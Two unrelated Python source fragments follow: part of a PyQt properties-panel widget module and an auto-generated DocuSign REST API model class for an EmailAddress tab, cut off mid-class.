self.mainVLayout.addWidget(self.ContentWidget)
self.spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.mainVLayout.addItem(self.spacerItem)
self.setWindowTitle(self.objectName())
self.pbHead.setStyleSheet(self.pbHead.styleSheet() + "\nText-align:left;")
self.contentHiddenIcon = self.pbHead.style().standardIcon(QtWidgets.QStyle.SP_TitleBarUnshadeButton)
self.contentVisibleIcon = self.pbHead.style().standardIcon(QtWidgets.QStyle.SP_TitleBarShadeButton)
self.updateIcon()
def addWidget(self, widget):
self.mainVLayout.addWidget(widget)
def removeSpacer(self):
if self.spacerItem is not None:
self.mainVLayout.removeItem(self.spacerItem)
del self.spacerItem
self.spacerItem = None
def setContentHiddenIcon(self, icon):
self.contentHiddenIcon = icon
def setContentVisibleIcon(self, icon):
self.contentVisibleIcon = icon
def toggleCollapsed(self):
if self.ContentWidget.isVisible():
self.setCollapsed(True)
else:
self.setCollapsed(False)
def setButtonName(self, name):
self.pbHead.setText(name)
def isCollapsed(self):
return self.ContentWidget.isHidden()
def updateIcon(self):
if self.isCollapsed():
self.pbHead.setIcon(self.contentHiddenIcon)
else:
self.pbHead.setIcon(self.contentVisibleIcon)
def setCollapsed(self, bCollapsed=False):
self.ContentWidget.setVisible(not bCollapsed)
self.updateIcon()
class PropertyEntry(QtWidgets.QWidget):
"""docstring for PropertyEntry."""
def __init__(self, label, widget, parent=None, hideLabel=False, maxLabelWidth=None, toolTip=""):
super(PropertyEntry, self).__init__(parent)
self.label = label
self.layout = QtWidgets.QHBoxLayout(self)
self.layout.setContentsMargins(1, 1, 1, 1)
if not hideLabel:
label = QtWidgets.QLabel(label + ":")
label.setStyleSheet("font: bold")
label.setToolTip(toolTip)
if not maxLabelWidth:
label.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred))
else:
label.setMaximumWidth(maxLabelWidth)
self.layout.addWidget(label)
self.layout.addWidget(widget)
self.index = -1
def getLabel(self):
return self.label
class CollapsibleFormWidget(CollapsibleWidget):
def __init__(self, parent=None, headName="Collapse", noSpacer=True, collapsed=False, hideLabels=False):
super(CollapsibleFormWidget, self).__init__(parent, headName=headName, noSpacer=noSpacer, collapsed=collapsed)
self.hideLabels = hideLabels
self.Layout = QtWidgets.QVBoxLayout(self.ContentWidget)
self.Layout.setObjectName("CollapseWidgetFormLayout")
self.Layout.setSpacing(2)
self.Layout.setContentsMargins(0, 0, 0, 5)
self.propertyNames = {}
self.entryNames = {}
self.updateIcon()
self.groups = {}
def setSpacing(self, spacing=2):
self.Layout.setSpacing(spacing)
def isAllWidgetsHidden(self):
count = self.Layout.count()
hidden = 0
for i in range(count):
widget = self.Layout.itemAt(i).widget()
if widget.isHidden():
hidden += 1
return count == hidden
def filterContent(self, pattern):
count = self.Layout.count()
for key, value in self.entryNames.items():
if isinstance(value, PropertyEntry):
value.setVisible(pattern.lower() in value.getLabel().lower())
for key, value in self.groups.items():
if isinstance(value, CollapSibleGoupBox):
if value.isAllWidgetsHidden():
value.hide()
else:
value.show()
value.setCollapsed(False)
def insertWidget(self, index=0, label=None, widget=None, maxLabelWidth=None, group=None):
if widget is None or isinstance(widget, CollapsibleWidget):
return False
if group is not None and group != "":
if group in self.groups:
groupW = self.groups[group]
else:
groupW = CollapSibleGoupBox(group)
self.groups[group] = groupW
entry = PropertyEntry(str(label), widget, hideLabel=self.hideLabels, maxLabelWidth=maxLabelWidth)
self.propertyNames[label] = widget
self.entryNames[label] = entry
if group is None or group == "":
self.Layout.insertWidget(index, entry)
else:
groupW.insertWidget(index, entry)
self.Layout.addWidget(groupW)
return True
def addWidget(self, label=None, widget=None, maxLabelWidth=None, group=None):
if widget is None or isinstance(widget, CollapsibleWidget):
return False
if group is not None and group != "":
if group in self.groups:
groupW = self.groups[group]
else:
groupW = CollapSibleGoupBox(group)
self.groups[group] = groupW
self.propertyNames[label] = widget
entry = PropertyEntry(str(label), widget, hideLabel=self.hideLabels, maxLabelWidth=maxLabelWidth, toolTip=widget.toolTip())
self.entryNames[label] = entry
if group is None or group == "":
self.Layout.addWidget(entry)
else:
groupW.addWidget(entry)
self.Layout.addWidget(groupW)
return True
def getWidgetByName(self, name):
if name in self.propertyNames:
return self.propertyNames[name]
else:
return None
class CollapSibleGoupBox(QtWidgets.QWidget):
def __init__(self,name):
super(CollapSibleGoupBox, self).__init__()
# widgets
self.controlGroup = QtWidgets.QGroupBox()
self.controlGroup.setTitle(name)
self.controlGroup.setCheckable(True)
self.controlGroup.setChecked(True)
# groupbox layout
self.groupLayout = QtWidgets.QVBoxLayout(self.controlGroup)
self.controlGroup.setFixedHeight(self.controlGroup.sizeHint().height())
# signals
self.controlGroup.toggled.connect(
lambda: self.toggleCollapsed())
# layout
self.mainLayout = QtWidgets.QGridLayout(self)
self.mainLayout.addWidget(self.controlGroup)
def isAllWidgetsHidden(self):
count = self.groupLayout.count()
hidden = 0
for i in range(count):
widget = self.groupLayout.itemAt(i).widget()
if widget.isHidden():
hidden += 1
return count == hidden
def insertWidget(self,index,widget):
self.groupLayout.insertWidget(index,widget)
self.controlGroup.setFixedHeight(self.controlGroup.sizeHint().height())
def addWidget(self,widget):
self.groupLayout.addWidget(widget)
self.controlGroup.setFixedHeight(self.controlGroup.sizeHint().height())
def toggleCollapsed(self):
state = self.controlGroup.isChecked()
if state:
self.controlGroup.setFixedHeight(self.controlGroup.sizeHint().height())
else:
self.controlGroup.setFixedHeight(30)
def setCollapsed(self, bCollapsed=False):
self.controlGroup.setChecked(not bCollapsed)
if not bCollapsed:
self.controlGroup.setFixedHeight(self.controlGroup.sizeHint().height())
else:
self.controlGroup.setFixedHeight(30)
class PropertiesWidget(QtWidgets.QWidget):
"""docstring for PropertiesWidget."""
spawnDuplicate = QtCore.Signal()
def __init__(self, parent=None, searchByHeaders=False):
super(PropertiesWidget, self).__init__(parent)
self.setWindowTitle("Properties view")
self.mainLayout = QtWidgets.QVBoxLayout(self)
self.mainLayout.setObjectName("propertiesMainLayout")
self.mainLayout.setContentsMargins(2, 2, 2, 2)
self.searchBox = QtWidgets.QLineEdit(self)
self.searchBox.setObjectName("lineEdit")
self.searchBox.setPlaceholderText(str("search..."))
self.searchBox.textChanged.connect(self.filterByHeaders if searchByHeaders else self.filterByHeadersAndFields)
self.searchBoxWidget = QtWidgets.QWidget()
self.searchBoxLayout = QtWidgets.QHBoxLayout(self.searchBoxWidget)
self.searchBoxLayout.setContentsMargins(1, 1, 1, 1)
self.searchBoxLayout.addWidget(self.searchBox)
# self.settingsButton = QtWidgets.QToolButton()
# self.settingsButton.setIcon(QtGui.QIcon(":/settings.png"))
# self.settingsMenu = QtWidgets.QMenu()
# self.editPropertiesAction = QtWidgets.QAction("Edit Parameter Interface", None)
# self.settingsMenu.addAction(self.editPropertiesAction)
# self.settingsButton.setMenu(self.settingsMenu)
# self.editPropertiesAction.triggered.connect(self.showPropertyEditor)
#self.settingsButton.clicked.connect(self.spawnDuplicate.emit)
# self.settingsButton.setPopupMode(QtWidgets.QToolButton.InstantPopup)
self.lockCheckBox = QtWidgets.QToolButton()
self.lockCheckBox.setCheckable(True)
self.lockCheckBox.setIcon(QtGui.QIcon(':/unlocked.png'))
self.lockCheckBox.toggled.connect(self.changeLockIcon)
self.searchBoxLayout.addWidget(self.lockCheckBox)
self.tearOffCopy = QtWidgets.QToolButton()
self.tearOffCopy.setIcon(QtGui.QIcon(":/tear_off_copy_bw.png"))
self.tearOffCopy.clicked.connect(self.spawnDuplicate.emit)
self.searchBoxLayout.addWidget(self.tearOffCopy)
self.mainLayout.addWidget(self.searchBoxWidget)
self.searchBoxWidget.hide()
self.contentLayout = QtWidgets.QVBoxLayout()
self.contentLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
self.mainLayout.addLayout(self.contentLayout)
self.spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.mainLayout.addItem(self.spacerItem)
self.mainLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
self.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding))
def changeLockIcon(self,checked):
if checked:
self.lockCheckBox.setIcon(QtGui.QIcon(':/locked.png'))
else:
self.lockCheckBox.setIcon(QtGui.QIcon(':/unlocked.png'))
def setLockCheckBoxVisible(self, bVisible):
self.lockCheckBox.setVisible(bVisible)
def setTearOffCopyVisible(self, bVisible):
self.tearOffCopy.setVisible(bVisible)
def setSearchBoxVisible(self, bVisible):
self.searchBox.setVisible(bVisible)
def filterByHeaders(self, text):
count = self.contentLayout.count()
for i in range(count):
item = self.contentLayout.itemAt(i)
w = item.widget()
if w:
if text.lower() in w.title().lower():
w.show()
else:
w.hide()
def filterByHeadersAndFields(self, text):
count = self.contentLayout.count()
for i in range(count):
item = self.contentLayout.itemAt(i)
w = item.widget()
if w:
w.filterContent(text)
if w.isAllWidgetsHidden():
w.hide()
else:
w.show()
w.setCollapsed(False)
def isLocked(self):
return self.lockCheckBox.isChecked()
def clear(self):
if not self.isLocked():
clearLayout(self.contentLayout)
self.searchBoxWidget.hide()
self.lockCheckBox.setChecked(False)
def insertWidget(self, collapsibleWidget,index):
if not self.isLocked():
if isinstance(collapsibleWidget, CollapsibleFormWidget):
self.searchBoxWidget.show()
self.contentLayout.insertWidget(index, collapsibleWidget)
return True
def addWidget(self, collapsibleWidget):
if not self.isLocked():
if isinstance(collapsibleWidget, CollapsibleFormWidget):
self.searchBoxWidget.show()
self.contentLayout.insertWidget(-1, collapsibleWidget)
return True
def showPropertyEditor(self):
tree = EditPropertiesTreeWidget()
count = self.contentLayout.count()
folders = {}
for i in range(count):
item = self.contentLayout.itemAt(i)
w = item.widget()
if w:
if w.title() in ["Inputs"]:
for key,group in w.groups.items():
if key not in folders:
folders[key] = {}
#for e in range(group.groupLayout.count()):
# w = group.groupLayout.itemAt(e).widget()
# folders[key][w.getLabel()] = group.groupLayout.itemAt(e).widget()
for fold in folders:
folder = tree.addFolder(fold)
#for widg in folders[fold]:
# child = tree.addNormal(widg,folder)
d = QtWidgets.QDialog()
d.setLayout(QtWidgets.QHBoxLayout())
d.layout().addWidget(tree)
d.exec_()
newOrder = tree.model_to_dict()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
s = QtWidgets.QScrollArea()
pw = PropertiesWidget()
rootWidget = CollapsibleFormWidget(headName="Settings", noSpacer=True)
rootWidget.addWidget("test", QtWidgets.QPushButton("ss"))
rootWidget.addWidget("foo", QtWidgets.QPushButton(""))
rootWidget.addWidget("bar", QtWidgets.QPushButton(""))
rootWidget2 = CollapsibleFormWidget(headName="Test", noSpacer=True)
rootWidget2.addWidget("test2", QtWidgets.QPushButton("aa"))
pw.addWidget(rootWidget)
pw.addWidget(rootWidget2)
s.setWidget(pw)
s.show()
pw.clear()
sys.exit(app.exec_())
|
# coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
OpenAPI spec version: v2
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class EmailAddress(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, anchor_case_sensitive=None, anchor_horizontal_alignment=None, anchor_ignore_if_not_present=None, anchor_match_whole_word=None, anchor_string=None, anchor_units=None, anchor_x_offset=None, anchor_y_offset=None, bold=None, conditional_parent_label=None, conditional_parent_value=None, custom_tab_id=None, document_id=None, error_details=None, font=None, font_color=None, font_size=None, italic=None, merge_field=None, name=None, page_number=None, recipient_id=None, status=None, tab_group_labels=None, tab_id=None, tab_label=None, tab_order=None, template_locked=None, template_required=None, tooltip=None, underline=None, value=None, x_position=None, y_position=None):
"""
EmailAddress - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'anchor_case_sensitive': 'str',
'anchor_horizontal_alignment': 'str',
'anchor_ignore_if_not_present': 'str',
'anchor_match_whole_word': 'str',
'anchor_string': 'str',
'anchor_units': 'str',
'anchor_x_offset': 'str',
'anchor_y_offset': 'str',
'bold': 'str',
'conditional_parent_label': 'str',
'conditional_parent_value': 'str',
'custom_tab_id': 'str',
'document_id': 'str',
'error_details': 'ErrorDetails',
'font': 'str',
'font_color': 'str',
'font_size': 'str',
'italic': 'str',
'merge_field': 'MergeField',
'name': 'str',
'page_number': 'str',
'recipient_id': 'str',
'status': 'str',
'tab_group_labels': 'list[str]',
'tab_id': 'str',
'tab_label': 'str',
'tab_order': 'str',
'template_locked': 'str',
'template_required': 'str',
'tooltip': 'str',
'underline': 'str',
'value': 'str',
'x_position': 'str',
'y_position': 'str'
}
self.attribute_map = {
'anchor_case_sensitive': 'anchorCaseSensitive',
'anchor_horizontal_alignment': 'anchorHorizontalAlignment',
'anchor_ignore_if_not_present': 'anchorIgnoreIfNotPresent',
'anchor_match_whole_word': 'anchorMatchWholeWord',
'anchor_string': 'anchorString',
'anchor_units': 'anchorUnits',
'anchor_x_offset': 'anchorXOffset',
'anchor_y_offset': 'anchorYOffset',
'bold': 'bold',
'conditional_parent_label': 'conditionalParentLabel',
'conditional_parent_value': 'conditionalParentValue',
'custom_tab_id': 'customTabId',
'document_id': 'documentId',
'error_details': 'errorDetails',
'font': 'font',
'font_color': 'fontColor',
'font_size': 'fontSize',
'italic': 'italic',
'merge_field': 'mergeField',
'name': 'name',
'page_number': 'pageNumber',
'recipient_id': 'recipientId',
'status': 'status',
'tab_group_labels': 'tabGroupLabels',
'tab_id': 'tabId',
'tab_label': 'tabLabel',
'tab_order': 'tabOrder',
'template_locked': 'templateLocked',
'template_required': 'templateRequired',
'tooltip': 'tooltip',
'underline': 'underline',
'value': 'value',
'x_position': 'xPosition',
'y_position': 'yPosition'
}
self._anchor_case_sensitive = anchor_case_sensitive
self._anchor_horizontal_alignment = anchor_horizontal_alignment
self._anchor_ignore_if_not_present = anchor_ignore_if_not_present
self._anchor_match_whole_word = anchor_match_whole_word
self._anchor_string = anchor_string
self._anchor_units = anchor_units
self._anchor_x_offset = anchor_x_offset
self._anchor_y_offset = anchor_y_offset
self._bold = bold
self._conditional_parent_label = conditional_parent_label
self._conditional_parent_value = conditional_parent_value
self._custom_tab_id = custom_tab_id
self._document_id = document_id
self._error_details = error_details
self._font = font
self._font_color = font_color
self._font_size = font_size
self._italic = italic
self._merge_field = merge_field
self._name = name
self._page_number = page_number
self._recipient_id = recipient_id
self._status = status
self._tab_group_labels = tab_group_labels
self._tab_id = tab_id
self._tab_label = tab_label
self._tab_order = tab_order
self._template_locked = template_locked
self._template_required = template_required
self._tooltip = tooltip
self._underline = underline
self._value = value
self._x_position = x_position
self._y_position = y_position
@property
def anchor_case_sensitive(self):
"""
Gets the anchor_case_sensitive of this EmailAddress.
When set to **true**, the anchor string does not consider case when matching strings in the document. The default value is **true**.
:return: The anchor_case_sensitive of this EmailAddress.
:rtype: str
"""
return self._anchor_case_sensitive
@anchor_case_sensitive.setter
def anchor_case_sensitive(self, anchor_case_sensitive):
"""
Sets the anchor_case_sensitive of this EmailAddress.
When set to **true**, the anchor string does not consider case when matching strings in the document. The default value is **true**.
:param anchor_case_sensitive: The anchor_case_sensitive of this EmailAddress.
:type: str
"""
self._anchor_case_sensitive = anchor_case_sensitive
@property
def anchor_horizontal_alignment(self):
"""
Gets the anchor_horizontal_alignment of this EmailAddress.
Specifies the alignment of anchor tabs with anchor strings. Possible values are **left** or **right**. The default value is **left**.
:return: The anchor_horizontal_alignment of this EmailAddress.
:rtype: str
"""
return self._anchor_horizontal_alignment
@anchor_horizontal_alignment.setter
def anchor_horizontal_alignment(self, anchor_horizontal_alignment):
"""
Sets the anchor_horizontal_alignment of this EmailAddress.
Specifies the alignment of anchor tabs with anchor strings. Possible values are **left** or **right**. The default value is **left**.
:param anchor_horizontal_alignment: The anchor_horizontal_alignment of this EmailAddress.
:type: str
"""
self._anchor_horizontal_alignment = anchor_horizontal_alignment
@property
def anchor_ignore_if_not_present(self):
"""
Gets the anchor_ignore_if_not_present of this EmailAddress.
When set to **true**, this tab is ignored if anchorString is not found in the document.
:return: The anchor_ignore_if_not_present of this EmailAddress.
:rtype: str
"""
return self._anchor_ignore_if_not_present
@anchor_ignore_if_not_present.setter
def anchor_ignore_if_not_present(self, anchor_ignore_if_not_present):
"""
Sets the anchor_ignore_if_not_present of this EmailAddress.
When set to **true**, this tab is ignored if anchorString is not found in the document.
:param anchor_ignore_if_not_present: The anchor_ignore_if_not_present of this EmailAddress.
:type: str
"""
self._anchor_ignore_if_not_present = anchor_ignore_if_not_present
@property
def anchor_match_whole_word(self):
"""
Gets the anchor_match_whole_word of this EmailAddress.
When set to **true**, the anchor string in this tab matches whole words only (strings embedded in other strings are ignored.) The default value is **true**.
:return: The anchor_match_whole_word of this EmailAddress.
:rtype: str
"""
return self._anchor_match_whole_word
@anchor_match_whole_word.setter
def anchor_match_whole_word(self, anchor_match_whole_word):
"""
Sets the anchor_match_whole_word of this EmailAddress.
When set to **true**, the anchor string in this tab matches whole words only (strings embedded in other strings are ignored.) The default value is **true**.
:param anchor_match_whole_word: The anchor_match_whole_word of this EmailAddress.
:type: str
"""
self._anchor_match_whole_word = anchor_match_whole_word
@property
def anchor_string(self):
"""
Gets the anchor_string of this EmailAddress.
Anchor text information for a radio button.
:return: The anchor_string of this EmailAddress.
:rtype: str
"""
return self._anchor_string
@anchor_string.setter
def anchor_string(self, anchor_string):
"""
Sets the anchor_string of this EmailAddress.
Anchor text information for a radio button.
:param anchor_string: The anchor_string of this EmailAddress.
:type: str
"""
self._anchor_string = anchor_string
@property
def anchor_units(self):
"""
Gets the anchor_units of this EmailAddress.
Specifies units of the X and Y offset. Units could be pixels, millimeters, centimeters, or inches.
:return: The anchor_units of this EmailAddress.
:rtype: str
"""
return self._anchor_units
@anchor_units.setter
def anchor_units(self, anchor_units):
"""
Sets the anchor_units of this EmailAddress.
Specifies units of the X and Y offset. Units could be pixels, millimeters, centimeters, or inches.
:param anchor_units: The anchor_units of this EmailAddress.
:type: str
"""
self._anchor_units = anchor_units
@property
def anchor_x_offset(self):
"""
Gets the anchor_x_offset of this EmailAddress.
Specifies the X axis location of the tab, in anchorUnits, relative to the anchorString.
:return: The anchor_x_offset of this EmailAddress.
:rtype: str
"""
return self._anchor_x_offset
@anchor_x_offset.setter
def anchor_x_offset(self, anchor_x_offset):
"""
Sets the anchor_x_offset of this EmailAddress.
Specifies the X axis location of the tab, in anchorUnits, relative to the anchorString.
:param anchor_x_offset: The anchor_x_offset of this EmailAddress.
:type: str
"""
self._anchor_x_offset = anchor_x_offset
@property
def anchor_y_offset(self):
"""
Gets the anchor_y_offset of this EmailAddress.
Specifies the Y axis location of the tab, in anchorUnits, relative to the anchorString.
:return: The anchor_y_offset of this EmailAddress.
:rtype: str
"""
return self._anchor_y_offset
@anchor_y_offset.setter
def anchor_y_offset(self, anchor_y_offset):
"""
Sets the anchor_y_offset of this EmailAddress.
Specifies the Y axis location of the tab, in anchorUnits, relative to the anchorString.
:param anchor_y_offset: The anchor_y_offset of this EmailAddress.
:type: str
"""
self._anchor_y_offset = anchor_y_offset
@property
def bold(self):
"""
Gets the bold of this EmailAddress.
When set to **true**, the information in the tab is bold.
:return: The bold of this EmailAddress.
:rtype: str
"""
return self._bold
@bold.setter
def bold(self, bold):
"""
Sets the bold of this EmailAddress.
When set to **true**, the information in the tab is bold.
:param bold: The bold of this EmailAddress.
:type: str
"""
self._bold = bold
@property
def conditional_parent_label(self):
"""
Gets the conditional_parent_label of this EmailAddress.
For conditional fields this is the TabLabel of the parent tab that controls this tab's visibility.
:return: The conditional_parent_label of this EmailAddress.
:rtype: str
"""
return self._conditional_parent_label
@conditional_parent_label.setter
def conditional_parent_label(self, conditional_parent_label):
"""
Sets the conditional_parent_label of this EmailAddress.
For conditional fields this is the TabLabel of the parent tab that controls this tab's visibility.
:param conditional_parent_label: The conditional_parent_label of this EmailAddress.
:type: str
"""
self._conditional_parent_label = conditional_parent_label
@property
def conditional_parent_value(self):
"""
Gets the conditional_parent_value of this EmailAddress.
For conditional fields, this is the value of the parent tab that controls the tab's visibility. If the parent tab is a Checkbox, Radio button, Optional Signature, or Optional Initial use \"on\" as the value to show that the parent tab is active.
:return: The conditional_parent_value of this EmailAddress.
:rtype: str
"""
return self._conditional_parent_value
@conditional_parent_value.setter
def conditional_parent_value(self, conditional_parent_value):
"""
Sets the conditional_parent_value of this EmailAddress.
For conditional fields, this is the value of the parent tab that controls the tab's visibility. If the parent tab is a Checkbox, Radio button, Optional Signature, or Optional Initial use \"on\" as the value to show that the parent tab is active.
:param conditional_parent_value: The conditional_parent_value of this EmailAddress.
:type: str
"""
self._conditional_parent_value = conditional_parent_value
@property
def custom_tab_id(self):
"""
Gets the custom_tab_id of this EmailAddress.
The DocuSign generated custom tab ID for the custom tab to be applied. This can only be used when adding new tabs for a recipient. When used, the new tab inherits all the custom tab properties.
:return: The custom_tab_id of this EmailAddress.
:rtype: str
"""
return self._custom_tab_id
@custom_tab_id.setter
def custom_tab_id(self, custom_tab_id):
"""
Sets the custom_tab_id of this EmailAddress.
The DocuSign generated custom tab ID for the custom tab to be applied. This can only be used when adding new tabs for a recipient. When used, the new tab inherits all the custom tab properties.
:param custom_tab_id: The custom_tab_id of this EmailAddress.
:type: str
"""
self._custom_tab_id = custom_tab_id
@property
def document_id(self):
"""
Gets the document_id of this EmailAddress.
Specifies the document ID number that the tab is placed on. This must refer to an existing Document's ID attribute.
:return: The document_id of this EmailAddress.
:rtype: str
"""
return self._document_id
@document_id.setter
def document_id(self, document_id):
"""
Sets the document_id of this EmailAddress.
Specifies the document ID number that the tab is placed on. This must refer to an existing Document's ID attribute.
:param document_id: The document_id of this EmailAddress.
:type: str
"""
self._document_id = document_id
@property
def error_details(self):
"""
Gets the error_details of this EmailAddress.
:return: The error_details of this EmailAddress.
:rtype: ErrorDetails
"""
return self._error_details
@error_details.setter
def error_details(self, error_details):
"""
Sets the error_details of this EmailAddress.
:param error_details: The error_details of this EmailAddress.
:type: ErrorDetails
"""
self._error_details = error_details
@property
def font(self):
"""
Gets the font of this EmailAddress.
The font to be used for the tab value. Supported Fonts: Arial, Arial, ArialNarrow, Calibri, CourierNew, Garamond, Georgia, Helvetica, LucidaConsole, Tahoma, TimesNewRoman, Trebuchet, Verdana, MSGothic, MSMincho, Default.
:return: The font of this EmailAddress.
:rtype: str
"""
return self._font
@font.setter
def font(self, font):
"""
Sets the font of this EmailAddress.
The font to be used for the tab value. Supported Fonts: Arial, Arial, ArialNarrow, Calibri, CourierNew, Garamond, Georgia, Helvetica, LucidaConsole, Tahoma, TimesNewRoman, Trebuchet, Verdana, MSGothic, MSMincho, Default.
:param font: The font of this EmailAddress.
:type: str
"""
self._font = font
@property
def font_color(self):
"""
Gets the font_color of this EmailAddress.
The font color used for the information in the tab. Possible values are: Black, BrightBlue, BrightRed, DarkGreen, DarkRed, Gold, Green, NavyBlue, Purple, or White.
:return: The font_color of this EmailAddress.
:rtype: str
"""
return self._font_color
@font_color.setter
def font_color(self, font_color):
"""
Sets the font_color of this EmailAddress.
The font color used for the information in the tab. Possible values are: Black, BrightBlue, BrightRed, DarkGreen, DarkRed, Gold, Green, NavyBlue, Purple, or White.
:param font_color: The font_color of this EmailAddress.
:type: str
"""
self._font_color = font_color
@property
def font_size(self):
"""
Gets the font_size of this EmailAddress.
The font size used for the information in the tab. Possible values are: Size7, Size8, Size9, Size10, Size11, Size12, Size14, Size16, Size18, Size20, Size22, Size24, Size26, Size28, Size36, Size48, or Size72.
:return: The font_size of this EmailAddress.
:rtype: str
"""
return self._font_size
@font_size.setter
def font_size(self, font_size):
"""
Sets the font_size of this EmailAddress.
The font size used for the information in the tab. Possible values are: Size7, Size8, Size9, Size10, Size11, Size12, Size14, Size16, Size18, Size20, Size22, Size24, Size26, Size28, Size36, Size48, or Size72.
:param font_size: The font_size of this EmailAddress.
:type: str
"""
self._font_size = font_size
@property
def italic(self):
"""
Gets the italic of this EmailAddress.
When set to **true**, the information in the tab is italic.
:return: The italic of this EmailAddress.
:rtype: str
"""
return self._italic
@italic.setter
def italic(self, italic):
"""
Sets the italic of this EmailAddress.
When set to **true**, the information in the tab is italic.
:param italic: The italic of this EmailAddress.
:type: str
"""
self._italic = italic
@property
def merge_field(self):
"""
Gets the merge_field of this EmailAddress.
:return: The merge_field of this EmailAddress.
:rtype: MergeField
"""
return self._merge_field
@merge_field.setter
def merge_field(self, merge_field):
"""
Sets the merge_field of this EmailAddress.
:param merge_field: The merge_field of this EmailAddress.
:type: MergeField
"""
self._merge_field = merge_field
@property
def name(self):
"""
Gets the name of this EmailAddress.
:return: The name of this EmailAddress.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this EmailAddress.
:param name: The name of this EmailAddress.
:type: str
"""
self._name = name
@property
def page_number(self):
"""
Gets the page_number of this EmailAddress.
Specifies the page number on which the tab is located.
:return: The page_number of this EmailAddress.
:rtype: str
"""
return self._page_number
@page_number.setter
def page_number(self, page_number):
"""
Sets the page_number of this EmailAddress.
Specifies the page number on which the tab is located.
:param page_number: The page_number of this EmailAddress.
:type: str
"""
self._page_number = page_number
@property
def recipient_id(self):
"""
Gets the recipient_id of this EmailAddress.
Unique for the recipient. It is used by the tab element to indicate which recipient is to sign the Document.
:return: The recipient_id of this EmailAddress.
:rtype: str
"""
return self._recipient_id
@recipient_id.setter
def recipient_id(self, recipient_id):
"""
Sets the recipient_id of this EmailAddress.
Unique for the recipient. It is used by the tab element to indicate which recipient is to sign the Document.
:param recipient_id: The recipient_id of this EmailAddress.
:type: str
"""
self._recipient_id = recipient_id
@property
def status(self):
"""
Gets the status of this EmailAddress.
Indicates the envelope status. Valid values are: * sent - The envelope is sent to the recipients. * created - The envelope is saved as a draft and can be modified and sent later.
:return: The status of this EmailAddress.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this EmailAddress.
Indicates the envelope status. Valid values are: * sent - The envelope is sent to the recipients. * created - The envelope is saved as a draft and can be modified and sent later.
:param status: The status of this EmailAddress.
:type: str
"""
self._status = status
@property
def tab_group_labels(self):
"""
Gets the tab_group_labels of this EmailAddress.
:return: The tab_group_labels of this EmailAddress.
:rtype: list[str]
"""
return self._tab_group_labels
@tab_group_labels.setter
def tab_group_labels(self, tab_group_labels):
"""
Sets the tab_group_labels of this EmailAddress.
:param tab_group_labels: The tab_group_labels of this EmailAddress.
:type: list[str]
"""
self._tab_group_labels = tab_group_labels
@property
def tab_id(self):
"""
Gets the tab_id of this EmailAddress.
The unique identifier for the tab. The tabid can be retrieved with the [ML:GET call].
:return: The tab_id of this EmailAddress.
:rtype: str
"""
return self._tab_id
@tab_id.setter
def tab_id(self, tab_id):
"""
Sets the tab_id of this EmailAddress.
The unique identifier for the tab. The tabid can be retrieved with the [ML:GET call].
:param tab_id: The tab_id of this EmailAddress.
:type: str
"""
self._tab_id = tab_id
@property
def tab_label(self):
"""
Gets the tab_label of this EmailAddress.
The label string associated with the tab.
:return: The tab_label of this EmailAddress.
:rtype: str
"""
return self._tab_label
@tab_label.setter
def tab_label(self, tab_label):
"""
Sets the tab_label of this EmailAddress.
The label string associated with the tab.
:param tab_label: The tab_label of this EmailAddress.
:type: str
"""
self._tab_label = tab_label
@property
def tab_order(self):
"""
Gets the tab_order of this EmailAddress.
:return: The tab_order of this EmailAddress.
:rtype: str
"""
return self._tab_order
@tab_order.setter
def tab_order(self, tab_order):
"""
Sets the tab_order of this EmailAddress.
:param tab_order: The tab_order of this EmailAddress.
:type: str
"""
self._tab_order = tab_order
@property
def template_locked(self):
"""
Gets the template_locked of this EmailAddress.
When set to **true**, the sender cannot change any attributes of the recipient. Used only when working with template recipients.
:return: The template_locked of this EmailAddress.
:rtype: str
"""
return self._template_locked
@template_locked.setter
def template_locked(self, template_locked):
"""
Sets the template_locked of this EmailAddress.
When set to **true**, the sender cannot change any attributes of the recipient. Used only when working with template recipients.
:param template_locked: The template_locked of this EmailAddress.
:type: str
"""
self._template_locked = template_locked
@property
def template_required(self):
"""
Gets the template_required of this EmailAddress.
When set to **true**, the sender may not remove the recipient. Used only when working with template recipients.
:return: The template_required of this EmailAddress.
:rtype: str
"""
return self._template_required
@template_required.setter
def template_required(self, template_required):
"""
Sets the template_required of this EmailAddress.
When set to **true**, the sender may not remove the recipient. Used only when working with template recipients.
:param template_required: The template_required of this EmailAddress.
:type: str
"""
self._template_required = template_required
@property
def tooltip(self):
"""
Gets the tooltip of this EmailAddress.
:return: The tooltip of this EmailAddress.
:rtype: str
"""
return self._tooltip
@tooltip.setter
def tooltip(self, tooltip):
"""
Sets the tooltip of this EmailAddress.
:param tooltip: The tooltip of this EmailAddress.
:type: str
"""
self._tooltip = tooltip
@property
def underline(self):
"""
Gets the underline of this EmailAddress.
When set to **true**, the information in the tab is underlined.
:return: The underline of this EmailAddress.
:rtype: str
"""
return self._underline
@underline.setter
def underline(self, underline):
"""
Sets the underline of this EmailAddress.
When set to **true**, the information in the tab is underlined.
:param underline: The underline of this EmailAddress.
:type: str
"""
self._underline = underline
@property
def value(self):
"""
Gets the value of this EmailAddress.
Specifies the value of the tab.
:return: The value of this EmailAddress.
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""
Sets the value of this EmailAddress.
Specifies the value of the tab.
:param value: The value of this EmailAddress.
:type: str
"""
self._value = value
@property
